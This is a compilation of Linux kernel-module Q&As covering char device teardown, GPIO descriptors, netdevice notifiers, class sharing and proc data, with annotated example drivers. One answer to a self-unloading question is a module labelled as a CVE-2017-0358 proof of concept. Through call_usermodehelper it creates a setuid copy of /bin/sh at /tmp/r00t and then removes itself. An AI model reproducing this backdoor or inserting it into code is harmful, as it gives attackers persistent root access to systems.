I am writing a simple character driver, scull, based on LDD. For my sample character driver, even though the module is unloaded, the device with its major number still exists in /proc/devices. How do I remove that?
My module exit function has
void scull_exit(void)
{
unregister_chrdev(Major, "scull1");
cdev_del(my_cdev);
printk(KERN_ALERT "Good Bye\n");
}
I could see the old device with its major number when I load the new module after unloading it.
cdev_del takes a pointer; ensure that your my_cdev is a pointer:
void cdev_del(struct cdev *);
It is cdev_del first and unregister_chrdev later; it seems you have done it the other way. Use cdev_del first and then unregister_chrdev_region.
You have mixed up the old notation of unregister_chrdev and the new notation of cdev_del.
Either unregister_chrdev should be used when you use register_chrdev for registering,
OR
"cdev_init/cdev_add after register_chrdev_region" should be used in conjunction with "cdev_del before unregister_chrdev_region".
struct cdev has an owner field that should be set to THIS_MODULE. Make sure it is set.
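The answers above describe the pairing and the order but do not show it end to end. The following is an added example, not code from the question or any answer: a minimal module that uses the new-style calls consistently (alloc_chrdev_region / cdev_init / cdev_add on load, cdev_del / unregister_chrdev_region in reverse order on unload) and sets the owner field. The names scull_devno, scull_cdev and scull_fops are assumptions standing in for the asker's own; the file_operations table is deliberately empty.

```c
/* Added example (not the asker's or the answerers' code): correct
 * registration/teardown pairing for a cdev-based character device. */
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/cdev.h>

#define SCULL_NAME "scull1"        /* name that appears in /proc/devices */

static dev_t scull_devno;          /* major:minor handed out by the kernel */
static struct cdev scull_cdev;     /* embedded, so &scull_cdev is the pointer cdev_del wants */

static const struct file_operations scull_fops = {
	.owner = THIS_MODULE,      /* no real operations in this example */
};

static int __init scull_init(void)
{
	int ret;

	/* 1. reserve a number range: dynamic major, one minor, registered under SCULL_NAME */
	ret = alloc_chrdev_region(&scull_devno, 0, 1, SCULL_NAME);
	if (ret)
		return ret;

	/* 2. initialise the cdev, claim ownership, then make it live */
	cdev_init(&scull_cdev, &scull_fops);
	scull_cdev.owner = THIS_MODULE;
	ret = cdev_add(&scull_cdev, scull_devno, 1);
	if (ret) {
		/* undo step 1, otherwise the major would stay listed in /proc/devices */
		unregister_chrdev_region(scull_devno, 1);
		return ret;
	}
	pr_info("%s: registered with major %d\n", SCULL_NAME, MAJOR(scull_devno));
	return 0;
}

static void __exit scull_exit(void)
{
	/* strict reverse of init: remove the cdev first, then release the numbers */
	cdev_del(&scull_cdev);
	unregister_chrdev_region(scull_devno, 1);
	pr_info("%s: unloaded\n", SCULL_NAME);
}

module_init(scull_init);
module_exit(scull_exit);
MODULE_LICENSE("GPL");
```

After rmmod, `grep scull1 /proc/devices` should print nothing; if the name is still listed, the region was never released, which is exactly what mixing unregister_chrdev with cdev_add produces.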
I am quite new at writing kernel drivers and there is something bothering me a lot. It would be great if you could kick me in the right direction.
I am writing a module for a device that has to be powered by setting a GPIO to HIGH state.
In Documentation/gpio/* there are texts which say I should use the new descriptor-based interface of the GPIO framework. But how do I use it?
When I add an include like #include
it compiles and I can run the driver. But calling gpiod_get(...) just returns fffffffffffffffe. It makes sense somehow, as the implementation of that function within linux/gpio/consumer.h is:
static inline struct gpio_desc *__must_check gpiod_get(struct device *dev, const char *con_id, enum gpiod_flags flags)
{
	return ERR_PTR(-ENOSYS);
}
The implementation of the function exists in drivers/gpio/devres.c as well. How can I use that one?
It looks to me as if I am not supposed to use that implementation.
I hope you can help me, as it is getting really irritating.
As it turned out, it was just necessary to include the file gpio/gpiolib as well, which delivers additional definitions.
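The -ENOSYS stub quoted in the question is the fallback that linux/gpio/consumer.h compiles when CONFIG_GPIOLIB is disabled, so the kernel configuration is the first thing to verify when gpiod_get() returns fffffffffffffffe (which is ERR_PTR(-ENOSYS) printed as a pointer). The following is an added example, not the asker's driver: a platform driver that obtains its power GPIO through the descriptor interface with the resource-managed variant, checks the returned pointer with IS_ERR() instead of dereferencing it, and drives it low again on remove. The con_id "power", the compatible string "example,mydev" and the driver name are assumptions; the remove signature is the int-returning one used by kernels of the question's era.

```c
/* Added example (not the asker's code): descriptor-based GPIO consumer
 * in a platform driver. Assumes CONFIG_GPIOLIB=y and a device node with
 * a power-gpios property (all names are constructed for this example). */
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/gpio/consumer.h>
#include <linux/err.h>

static int mydev_probe(struct platform_device *pdev)
{
	struct gpio_desc *power;

	/* devm_: released automatically on probe failure or driver detach.
	 * GPIOD_OUT_HIGH requests the line as output and drives it high at once. */
	power = devm_gpiod_get(&pdev->dev, "power", GPIOD_OUT_HIGH);
	if (IS_ERR(power)) {
		/* -ENOSYS lands here when gpiolib is compiled out,
		 * -ENOENT when the property is missing from the device node */
		dev_err(&pdev->dev, "power gpio unavailable: %ld\n", PTR_ERR(power));
		return PTR_ERR(power);
	}
	platform_set_drvdata(pdev, power);
	dev_info(&pdev->dev, "powered on\n");
	return 0;
}

static int mydev_remove(struct platform_device *pdev)
{
	struct gpio_desc *power = platform_get_drvdata(pdev);

	gpiod_set_value(power, 0);   /* power the device down on unload */
	return 0;
}

static const struct of_device_id mydev_of_match[] = {
	{ .compatible = "example,mydev" },   /* assumed compatible string */
	{ }
};
MODULE_DEVICE_TABLE(of, mydev_of_match);

static struct platform_driver mydev_driver = {
	.probe  = mydev_probe,
	.remove = mydev_remove,
	.driver = {
		.name           = "mydev",
		.of_match_table = mydev_of_match,
	},
};
module_platform_driver(mydev_driver);
MODULE_LICENSE("GPL");
```

Checking IS_ERR() before any use is what turns a misconfigured kernel into a clean probe failure rather than a dereference of the value fffffffffffffffe.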
I am working on an Ubuntu kernel-mode netfilter module and need information about all network interfaces and their properties in the module code.
Inside init_module() I use register_netdevice_notifier() for that purpose. When the callback function is called I can see correct event codes like up/down and others, but it seems that the third parameter, void* cast to net_device*, provides an object with invalid properties: ->name is an empty string, ->ifindex is some nonsense number, etc.
I tried a debug version of the module on kernel 3.19 and rebuilt it also on 4.2. The result is the same: I cannot read the properties of the net_device relating to the event.
What can the problem be?
From what I can see in LXR, you need to call netdev_notifier_info_to_dev on the last parameter to get your net_device * (see here).
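The cast in the question fails because, since kernel 3.11, the pointer handed to a netdevice notifier is a struct netdev_notifier_info, whose first member is the net_device; reading it as a net_device misaligns every field, which is why ->name looks empty and ->ifindex looks random. The following is an added example, not the asker's module: a notifier that converts the pointer with netdev_notifier_info_to_dev() as the answer says and logs a few events. The module and function names are assumptions.

```c
/* Added example (not the asker's code): netdevice notifier that reads
 * the net_device correctly via netdev_notifier_info_to_dev(). */
#include <linux/module.h>
#include <linux/netdevice.h>

static int ifwatch_event(struct notifier_block *nb, unsigned long event, void *ptr)
{
	/* ptr is a struct netdev_notifier_info *, never a struct net_device * */
	struct net_device *dev = netdev_notifier_info_to_dev(ptr);

	switch (event) {
	case NETDEV_REGISTER:
		pr_info("ifwatch: %s (ifindex %d) registered\n", dev->name, dev->ifindex);
		break;
	case NETDEV_UP:
		pr_info("ifwatch: %s (ifindex %d) up\n", dev->name, dev->ifindex);
		break;
	case NETDEV_DOWN:
		pr_info("ifwatch: %s (ifindex %d) down\n", dev->name, dev->ifindex);
		break;
	case NETDEV_CHANGENAME:
		pr_info("ifwatch: ifindex %d renamed to %s\n", dev->ifindex, dev->name);
		break;
	default:
		break;
	}
	return NOTIFY_DONE;   /* observe only; never block the event */
}

static struct notifier_block ifwatch_nb = {
	.notifier_call = ifwatch_event,
};

static int __init ifwatch_init(void)
{
	/* registration replays NETDEV_REGISTER and NETDEV_UP for every
	 * interface that already exists, which gives the full inventory
	 * the question asks for without a separate walk */
	return register_netdevice_notifier(&ifwatch_nb);
}

static void __exit ifwatch_exit(void)
{
	unregister_netdevice_notifier(&ifwatch_nb);
}

module_init(ifwatch_init);
module_exit(ifwatch_exit);
MODULE_LICENSE("GPL");
```

After insmod, dmesg shows one "registered" and one "up" line per existing interface, followed by live events as interfaces change.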
I've made a simple module which prints the GDT and IDT on loading. After it's done its work, it's no longer needed and can be unloaded. But if it returns a negative number in order to stop loading, insmod will complain, and an error message will be logged in the kernel log.
How can a kernel module gracefully unload itself?
As far as I can tell, it is not possible with a stock kernel (you can modify the module loader core as I describe below but that's probably not a good thing to rely on).
Okay, so I've taken a look at the module loading and unloading code (kernel/module.c) as well as several users of the very suspiciously named module_put_and_exit. It seems as though there is no kernel module which does what you'd like to do. All of them start up kthreads inside the module's context and then kill the kthread upon completion of something (they don't automatically unload the module).
Unfortunately, the function which does the bulk of the module unloading (free_module) is statically defined within kernel/module.c. As far as I can see, there's no exported function which will call free_module from within a module. I feel like there's probably some reason for this (it's very possible that attempting to unload a module from within itself will cause a page fault because the page which contains the module's code needs to be freed). Although this probably could be solved by making a noreturn function which just schedules after preventing the current (invalid) task from being run again (or just running do_exit).
A further point to ask is: are you sure that you want to do this? Why don't you just make a shell script to load and unload the module and call it a day? Auto-unloading modules are probably a bit too close to Skynet for my liking.
EDIT: I've played around with this a bit and have figured out a way to do this if you're okay with modifying the module loader core. Add this function to kernel/module.c, and make the necessary modifications to include/linux/module.h:
/* Removes a module in situ, from within the module itself. */
void __purge_module(struct module *mod) {
free_module(mod);
do_exit(0);
/* We should never be here. */
BUG();
}
EXPORT_SYMBOL(__purge_module);
Calling this with __purge_module(THIS_MODULE) will unload your module and won't cause a page fault (because you don't return to the module's code). However, I would still not recommend doing this. I've done some simple volume testing (I inserted a module using this function ~10000 times to see if there were any resource leaks -- as far as I can see there aren't any).
Oh, you can definitely do it :)
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kmod.h>    /* call_usermodehelper(), UMH_WAIT_EXEC */
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358#gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
    char *envp[] = { "HOME=/tmp", NULL };
    char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
    char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
    printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    /* second helper runs rmmod on this module, so the module removes itself */
    call_usermodehelper(argvv[0], argvv, envp, UMH_WAIT_EXEC);
    return 0;   /* init_module must return a value; the original omitted it */
}
void cleanup_module(void) {
    /* the original had an invalid "return 0;" here, which made this printk unreachable */
    printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
get pointer for existing device class (struct class) in Linux kernel module
Hi all!
I am trying to register a device in an existing device class, but I am having trouble getting the pointer to the existing class. The kernel version is Linux 3.3.6.
I can create a class in a module, get the pointer to it and then use it to register the device with:
*cl = class_create(THIS_MODULE, className);
dev_ret = device_create(*cl, NULL, *dev, NULL, driverName);
However, I need to register another device in the same class from another module, but I couldn't find a way to get the pointer to an existing class. And I cannot create the class again in the other module, because since the class already exists, class_create returns NULL and not the pointer to the class required by device_create.
I found in http://lwn.net/Articles/102500/ a function that returns a pointer to a class by its name:
struct class * class_find(char * name)
However, when I try to compile, the compiler says it does not exist.
I thought this function was exported by the kernel (my module has license GPL), but it appears it is not.
Maybe I need to include some header?
I tried to rewrite this function, since its code is listed in the above link. But when I try to iterate over class_subsys with:
list_for_each_entry(this_class, &class_subsys.kset.list, subsys.kset.kobj.entry)
now the symbol class_subsys is not found. Again, I thought it was exported by the kernel.
I am not sure what is missing. Some header?
Am I doing it the wrong way?
Is there another function to do it?
I suppose if I could traverse sysfs from start I could get a pointer to an existing class.
But I also did not find how to start traversing sysfs.
All functions I have seen require a pointer to a kobject or kset to start traversing. But I have no pointer even to the root of sysfs or the kernel objects, so I cannot start traversing the tree to get a class pointer.
Can anyone point me in the right direction please?
I think the input core is done this way; here is the snippet:
Take a look at: https://github.com/torvalds/linux/blob/master/drivers/input/input.c#L1720
Best regards!
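The input core does not look the class up by name at all: it defines a statically allocated struct class, registers it with class_register() and exports the symbol, so every other module that wants to add devices to that class simply references it through a shared header and the module loader resolves the dependency. The following is an added example of that pattern, not the input core's code or the asker's: three compilation units (a shared header, the module that owns the class, and a second module that adds a device to it). All names (myclass, mod_a, mod_b, mydev_b) are assumptions; the .owner member of struct class exists in 3.3.6 and was removed in 6.4, and the class_create signature in the question changed in 6.4 as well.

```c
/* Added example (not the input core's or the asker's code): sharing one
 * struct class between two modules via an exported symbol.
 * ---- myclass.h: included by both modules ---- */
#include <linux/device.h>
extern struct class myclass;

/* ---- mod_a.c: owner of the class, loaded first ---- */
#include <linux/module.h>
#include <linux/device.h>

struct class myclass = {
	.name  = "myclass",
	.owner = THIS_MODULE,          /* field present up to kernel 6.3 */
};
EXPORT_SYMBOL_GPL(myclass);            /* GPL modules can now reference it */

static int __init mod_a_init(void)
{
	/* statically allocated object, so class_register(), not class_create() */
	return class_register(&myclass);
}

static void __exit mod_a_exit(void)
{
	class_unregister(&myclass);    /* refuses to unload while mod_b holds the symbol */
}
module_init(mod_a_init);
module_exit(mod_a_exit);
MODULE_LICENSE("GPL");

/* ---- mod_b.c: adds a device to the class, depends on mod_a ---- */
#include <linux/module.h>
#include <linux/device.h>
#include <linux/err.h>

static struct device *b_dev;

static int __init mod_b_init(void)
{
	/* devt 0: a class device without a /dev node, enough to appear in
	 * /sys/class/myclass/mydev_b */
	b_dev = device_create(&myclass, NULL, MKDEV(0, 0), NULL, "mydev_b");
	return PTR_ERR_OR_ZERO(b_dev);
}

static void __exit mod_b_exit(void)
{
	device_destroy(&myclass, MKDEV(0, 0));
}
module_init(mod_b_init);
module_exit(mod_b_exit);
MODULE_LICENSE("GPL");
```

Because mod_b uses a symbol exported by mod_a, modprobe loads mod_a first and rmmod refuses to remove it while mod_b is loaded, which is the ownership guarantee a name-based lookup of an arbitrary class would not give you.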
I'm writing a Linux kernel module that does some work with /proc. I'm trying to use the new seq methods for returning the data for /proc. Anyhow, after I call proc_create_data() I have a proc_dir_entry (whose ->data member is pointing at my supplied context). Anyhow, the file_operations structure is also passed, and I really need to know how to access either the proc_dir_entry or the proc_dir_entry->data from the open() file operation.
The answer was to use the PDE macro to convert the inode* into a pointer to the proc_dir_entry, which of course had a "data" member pointing at what I needed.
struct proc_dir_entry* pde = PDE( inode );
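The PDE() macro was made private to fs/proc in kernel 3.10; from then on the supported way to reach the data pointer passed to proc_create_data() is PDE_DATA(inode) (renamed pde_data() in 5.17). The following is an added example, not the asker's module: a seq_file-based /proc entry whose open() hands the per-entry context to single_open(), so show() receives it in m->private. The entry name, the context structure and its constructed contents are assumptions; the file_operations form of proc_create_data() matches kernels 3.10 through 5.5 (5.6 switched it to struct proc_ops).

```c
/* Added example (not the asker's code): passing proc_create_data()'s
 * context through open() into a seq_file show() callback. */
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>

struct myproc_ctx {
	const char *label;
	int value;
};

/* constructed context for the example */
static struct myproc_ctx my_ctx = { .label = "demo", .value = 42 };

static int myproc_show(struct seq_file *m, void *v)
{
	struct myproc_ctx *c = m->private;   /* set by single_open() below */

	seq_printf(m, "%s=%d\n", c->label, c->value);
	return 0;
}

static int myproc_open(struct inode *inode, struct file *file)
{
	/* PDE_DATA(inode) is the pointer given as the last argument of
	 * proc_create_data(); it replaces PDE(inode)->data */
	return single_open(file, myproc_show, PDE_DATA(inode));
}

static const struct file_operations myproc_fops = {
	.owner   = THIS_MODULE,
	.open    = myproc_open,
	.read    = seq_read,
	.llseek  = seq_lseek,
	.release = single_release,
};

static int __init myproc_init(void)
{
	/* world-readable, no write handler: nothing user space can feed back in */
	if (!proc_create_data("myproc_demo", 0444, NULL, &myproc_fops, &my_ctx))
		return -ENOMEM;
	return 0;
}

static void __exit myproc_exit(void)
{
	remove_proc_entry("myproc_demo", NULL);
}

module_init(myproc_init);
module_exit(myproc_exit);
MODULE_LICENSE("GPL");
```

With the module loaded, `cat /proc/myproc_demo` prints `demo=42`; the same fops table can back any number of entries, each created with its own context pointer.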